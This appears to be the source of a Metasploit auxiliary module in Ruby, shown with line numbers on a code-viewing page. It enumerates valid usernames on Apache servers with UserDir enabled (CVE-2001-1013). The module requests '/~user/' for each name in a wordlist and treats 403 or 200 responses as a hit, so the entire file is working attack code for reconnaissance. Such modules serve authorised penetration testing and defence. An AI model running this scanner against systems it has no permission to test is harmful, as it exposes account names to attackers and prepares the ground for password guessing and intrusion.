Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10
  include Msf::Auxiliary::AuthBrute
11

12
  def initialize
13
    super(
14
      'Name'           => 'Apache "mod_userdir" User Enumeration',
15
      'Description'    => %q{Apache with the UserDir directive enabled generates different error
16
      codes when a username exists and there is no public_html directory and when the username
17
      does not exist, which could allow remote attackers to determine valid usernames on the
18
      server.},
19
      'Author'         =>
20
        [
21
          'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',
22
        ],
23
      'References'     =>
24
        [
25
          ['BID', '3335'],
26
          ['CVE', '2001-1013'],
27
          ['OSVDB', '637'],
28
        ],
29
      'License'        =>  MSF_LICENSE
30
    )
31

32
    register_options(
33
      [
34
        OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
35
        OptPath.new('USER_FILE',  [ true, "File containing users, one per line",
36
          File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
37
      ])
38

39
    deregister_options(
40
      'PASSWORD',
41
      'PASS_FILE',
42
      'USERPASS_FILE',
43
      'STOP_ON_SUCCESS',
44
      'BLANK_PASSWORDS',
45
      'USER_AS_PASS'
46
    )
47
  end
48

49
  def run_host(ip)
50
    @users_found = {}
51

52
    each_user_pass { |user,pass|
53
      do_login(user)
54
    }
55

56
    if(@users_found.empty?)
57
      print_status("#{full_uri} - No users found.")
58
    else
59
      print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
60
      report_note(
61
        :host => rhost,
62
        :port => rport,
63
        :proto => 'tcp',
64
        :sname => (ssl ? 'https' : 'http'),
65
        :type => 'users',
66
        :data => {:users =>  @users_found.keys.join(", ")}
67
      )
68
    end
69
  end
70

71
  def do_login(user)
72

73
    vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
74
    uri = normalize_uri(target_uri.path)
75
    payload = "#{uri}~#{user}/"
76
    begin
77
      res = send_request_cgi!(
78
        {
79
          'method'  => 'GET',
80
          'uri'     => payload,
81
          'ctype'   => 'text/plain'
82
        }, 20)
83

84
      return unless res
85
      if ((res.code == 403) or (res.code == 200))
86
        print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
87
        @users_found[user] = :reported
88
      else
89
        vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
90
      end
91
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
92
    rescue ::Timeout::Error, ::Errno::EPIPE
93
    end
94
  end
95
end
96

97